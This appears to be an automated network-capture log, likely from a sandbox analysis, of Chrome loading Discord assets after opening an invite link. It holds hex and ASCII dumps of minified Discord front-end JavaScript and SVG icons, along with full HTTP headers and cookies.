                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 35 34 36 29 2c 75 3d 6e 28 35 36 35 31 33 38 29 2c 5f 3d 6e 28 36 30 31 39 36 34 29 2c 45 3d 6e 28 35 39 38 30 37 37 29 2c 68 3d 6e 28 33 38 38 30 33 32 29 2c 70 3d 6e 28 33 32 35 39 32 39 29 3b 6c 65 74 20 66 3d 65 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 7b 73 70 65 61 6b 65 72 3a 6e 2c 67 75 69 6c 64 49 64 3a 69 2c 69 73 45 6d 62 65 64 3a 73 7d 3d 65 2c 6c 3d 6e 65 77 20 45 2e 5a 28 6e 2e 75 73 65 72 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 73 70 65 61 6b 65 72 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 6f 2e 41 76 61 74 61 72 2c 7b 73 72 63 3a 6c 2e 67 65 74 41 76 61 74 61 72 55 52 4c 28 69 2c 73 3f 31 36 3a 32 34 29 2c 73 69 7a 65 3a 73 3f 6f 2e 41 76 61 74 61 72
                                                                                                                                                                                                                                                                                    Data Ascii: 546),u=n(565138),_=n(601964),E=n(598077),h=n(388032),p=n(325929);let f=e=>{var t;let{speaker:n,guildId:i,isEmbed:s}=e,l=new E.Z(n.user);return(0,r.jsxs)("div",{className:p.speaker,children:[(0,r.jsx)(o.Avatar,{src:l.getAvatarURL(i,s?16:24),size:s?o.Avatar
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 2c 63 68 69 6c 64 72 65 6e 3a 6c 7d 29 5d 7d 29 7d 3b 74 2e 5a 3d 65 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 7b 73 74 61 67 65 49 6e 73 74 61 6e 63 65 3a 6e 2c 67 75 69 6c 64 3a 73 2c 69 73 43 61 72 64 3a 45 3d 21 31 2c 69 73 45 6d 62 65 64 3a 53 3d 21 31 2c 6f 6e 43 6c 69 63 6b 3a 6d 7d 3d 65 2c 43 3d 69 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 6e 75 6c 6c 3d 3d 73 3f 6e 75 6c 6c 3a 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 5a 50 3f 73 3a 6e 65 77 20 5f 2e 5a 50 28 73 29 2c 5b 73 5d 29 3b 69 66 28 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 75 6c 6c 3d 3d 43 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 7b 74 6f 70 69 63 3a 67 2c 73 70 65 61 6b 65 72 5f 63 6f 75 6e 74 3a 49 2c 70 61 72 74 69 63 69 70 61 6e 74 5f 63 6f 75 6e 74 3a 41 7d 3d 6e 2c 79 3d 6e 75 6c 6c 21 3d
                                                                                                                                                                                                                                                                                    Data Ascii: ,children:l})]})};t.Z=e=>{var t;let{stageInstance:n,guild:s,isCard:E=!1,isEmbed:S=!1,onClick:m}=e,C=i.useMemo(()=>null==s?null:s instanceof _.ZP?s:new _.ZP(s),[s]);if(null==n||null==C)return null;let{topic:g,speaker_count:I,participant_count:A}=n,y=null!=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 2c 63 68 69 6c 64 72 65 6e 3a 67 7d 29 2c 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6c 28 29 28 70 2e 6d 65 6d 62 65 72 73 2c 7b 5b 70 2e 65 6d 62 65 64 5d 3a 53 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 52 2e 6c 65 6e 67 74 68 3e 30 26 26 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 73 70 65 61 6b 65 72 73 2c 63 68 69 6c 64 72 65 6e 3a 5b 52 2e 6d 61 70 28 65 3d 3e 28 30 2c 72 2e 6a 73 78 29 28 66 2c 7b 73 70 65 61 6b 65 72 3a 65 2c 67 75 69 6c 64 49 64 3a 43 2e 69 64 2c 69 73 45 6d 62 65 64 3a 53 7d 2c 65 2e 75 73 65 72 2e 69 64 29 29 2c 4f 3e 30 3f 28 30 2c 72 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 73 70 65 61 6b 65 72 2c 63 68 69
                                                                                                                                                                                                                                                                                    Data Ascii: ,children:g}),(0,r.jsxs)("div",{className:l()(p.members,{[p.embed]:S}),children:[R.length>0&&(0,r.jsxs)("div",{className:p.speakers,children:[R.map(e=>(0,r.jsx)(f,{speaker:e,guildId:C.id,isEmbed:S},e.user.id)),O>0?(0,r.jsxs)("div",{className:p.speaker,chi
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 5f 4c 49 4e 4b 5f 43 4c 49 43 4b 45 44 2c 7b 66 69 6e 67 65 72 70 72 69 6e 74 3a 28 30 2c 6f 2e 4b 29 28 6e 2e 66 69 6e 67 65 72 70 72 69 6e 74 29 2c 61 74 74 65 6d 70 74 5f 69 64 3a 6e 2e 61 74 74 65 6d 70 74 49 64 2c 73 6f 75 72 63 65 3a 6e 2e 75 74 6d 53 6f 75 72 63 65 7d 29 2c 45 2e 5a 2e 6c 61 75 6e 63 68 28 74 2c 65 3d 3e 7b 21 65 26 26 28 30 2c 63 2e 64 4c 29 28 75 2e 5a 2e 66 61 6c 6c 62 61 63 6b 52 6f 75 74 65 29 7d 29 7d 7d 2c 31 34 34 31 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 4c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 2c 69 2c 73 3d 6e 28 39 39 30 35 34 37 29 2c 6c 3d 6e 28 35 34 34 38 39 31 29 2c 6f 3d 6e 28 35 37 30 31 34 30 29 2c 61 3d 6e 28 33 31 34 38 39
                                                                                                                                                                                                                                                                                    Data Ascii: _LINK_CLICKED,{fingerprint:(0,o.K)(n.fingerprint),attempt_id:n.attemptId,source:n.utmSource}),E.Z.launch(t,e=>{!e&&(0,c.dL)(u.Z.fallbackRoute)})}},144114:function(e,t,n){n.d(t,{L:function(){return i}});var r,i,s=n(990547),l=n(544891),o=n(570140),a=n(31489
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 2c 72 65 76 65 72 69 66 79 50 68 6f 6e 65 3a 28 65 2c 74 2c 6e 29 3d 3e 6c 2e 74 6e 2e 70 6f 73 74 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 50 48 4f 4e 45 5f 52 45 56 45 52 49 46 59 2c 62 6f 64 79 3a 7b 70 68 6f 6e 65 5f 74 6f 6b 65 6e 3a 65 2c 70 61 73 73 77 6f 72 64 3a 74 2c 63 68 61 6e 67 65 5f 70 68 6f 6e 65 5f 72 65 61 73 6f 6e 3a 6e 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 2c 72 65 6a 65 63 74 57 69 74 68 45 72 72 6f 72 3a 21 31 7d 29 2c 76 61 6c 69 64 61 74 65 50 68 6f 6e 65 46 6f 72 53 75 70 70 6f 72 74 3a 65 3d 3e 6c 2e 74 6e 2e 70 6f 73 74 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 56 45 52 49 46 59 5f 50 48 4f 4e 45 5f 46 4f 52 5f 54 49 43 4b 45 54 2c 62 6f 64 79 3a 7b 74 6f 6b 65 6e 3a 65 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30
                                                                                                                                                                                                                                                                                    Data Ascii: ,reverifyPhone:(e,t,n)=>l.tn.post({url:u.ANM.PHONE_REVERIFY,body:{phone_token:e,password:t,change_phone_reason:n},oldFormErrors:!0,rejectWithError:!1}),validatePhoneForSupport:e=>l.tn.post({url:u.ANM.VERIFY_PHONE_FOR_TICKET,body:{token:e},oldFormErrors:!0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 36 29 2c 64 3d 6e 28 38 30 31 34 36 31 29 2c 75 3d 6e 28 33 38 38 30 33 32 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 6c 65 74 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 2e 5a 50 2e 67 65 74 55 73 65 72 41 76 61 74 61 72 55 52 4c 28 7b 69 64 3a 65 2e 69 64 2c 61 76 61 74 61 72 3a 65 2e 61 76 61 74 61 72 2c 62 6f 74 3a 65 2e 62 6f 74 2c 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 3a 22 30 30 30 30 22 7d 2c 74 2c 38 30 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 6c 65 74 20 74 3d 28 30 2c 61 2e 5f 49 29 28 65 2e 75 73 65 72 6e 61 6d 65 29 2e 72 65 70 6c 61 63 65 28 64 2e 52 4e 2c 22 22 29
                                                                                                                                                                                                                                                                                    Data Ascii: 6),d=n(801461),u=n(388032);function _(e){let t=!(arguments.length>1)||void 0===arguments[1]||arguments[1];return l.ZP.getUserAvatarURL({id:e.id,avatar:e.avatar,bot:e.bot,discriminator:"0000"},t,80)}function E(e){let t=(0,a._I)(e.username).replace(d.RN,"")
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 3a 75 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 75 2e 74 2e 6d 43 72 41 55 56 29 7d 29 29 2e 77 69 74 68 28 7b 65 72 72 6f 72 3a 73 2e 50 2e 6e 75 6c 6c 69 73 68 7d 2c 28 29 3d 3e 28 7b 74 79 70 65 3a 63 2e 4b 2e 49 4e 54 45 52 4e 41 4c 5f 45 52 52 4f 52 2c 6d 65 73 73 61 67 65 3a 22 22 7d 29 29 2e 6f 74 68 65 72 77 69 73 65 28 28 29 3d 3e 76 6f 69 64 20 30 29 7d 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 32 30 32 34 2c 32 2c 34 29 2e 74 6f 4c 6f 63 61 6c 65 44 61 74 65 53 74 72 69 6e 67 28 65 2c 7b 6d 6f 6e 74 68 3a 22 6c 6f 6e 67 22 2c 64 61 79 3a 22 6e 75 6d 65 72 69 63 22 2c 79 65 61 72 3a 22 6e 75 6d 65 72 69 63 22 7d 29 7d 7d 2c 31 30 38 34 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64
                                                                                                                                                                                                                                                                                    Data Ascii: :u.intl.string(u.t.mCrAUV)})).with({error:s.P.nullish},()=>({type:c.K.INTERNAL_ERROR,message:""})).otherwise(()=>void 0)}function I(e){return new Date(2024,2,4).toLocaleDateString(e,{month:"long",day:"numeric",year:"numeric"})}},108427:function(e,t,n){n.d


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    122192.168.2.549842162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1385OUTGET /assets/5430e9964fe8364e084d.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 180
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d102bab57c78-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "b1d4c5e276e3aaa8ec41e6014dd572b2"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:50 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6GVyfxN0qUSk2R8%2FcfNj0VIdzuzeYSaJuTgBqejM14iS8IWxPe0HgucgdNe3HBoc1NrcZMnnuroaZ3FsKIC2hlue81eOWAc3nqgEMRtZGGIT3aX2uL5zTzYLuAVG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC180INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 39 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 20 39 22 20 77 69 64 74 68 3d 22 36 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 30 20 32 2e 38 33 39 31 32 76 33 2e 33 32 31 37 36 6c 33 20 32 2e 38 33 39 31 32 20 33 2d 32 2e 38 33 39 31 32 76 2d 33 2e 33 32 31 37 36 6c 2d 33 2d 32 2e 38 33 39 31 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    123192.168.2.549844162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC696OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/8e73d00e4bfe422e HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC624INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:51 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    allow: POST
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c2hQC%2B0PtWywUyTvv%2BvOBRUxPEWEBl3g9rsNc26UudFSCl0mSi%2FE6FhLKOqbQnXJKPWGwgSC7gHcxGPaDTFGjibcgLNafDHvJ97EWcxodwlV9QqxcwrSeeh9IfrN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d102ce367c99-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    124192.168.2.549845162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1385OUTGET /assets/ab03f7053698d417194c.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC956INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 137
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d103d9804245-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "7d883ba72b5dbc0229f5d1980205ee34"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:54 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9fVy4ugIJqx4SF5DCCqDcKLAswKwZOXiR3S1IpXwde3VneLUVFylFHZrBFiwOZFHiQyT4WfWALua2PWb9y840siD0jhoo4pW1%2FzZtJV3FCLomXh1Q6EfgnP%2BH9NB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC137INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 77 69 64 74 68 3d 22 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 35 20 32 68 32 76 38 68 2d 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    125192.168.2.549846162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC673OUTGET /assets/b54790681a89c77f55ad.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC968INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 16272
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d1044ca042e5-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "1ce0867ef5ab681018d7e32e7197dd4d"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Nov 2024 23:00:49 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpTkzLVyNFX8f%2FKUU0B6JShVrjYvmFgrkpvm%2FQ9NGbsiEVA05FtNhjrmw8Bz6DLXU1CX7c0mUozgMYekT8Ew%2FGn%2B7PmZv%2B0AvaNgifMDtzfWJ82K%2BSbSvMjEFYR1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
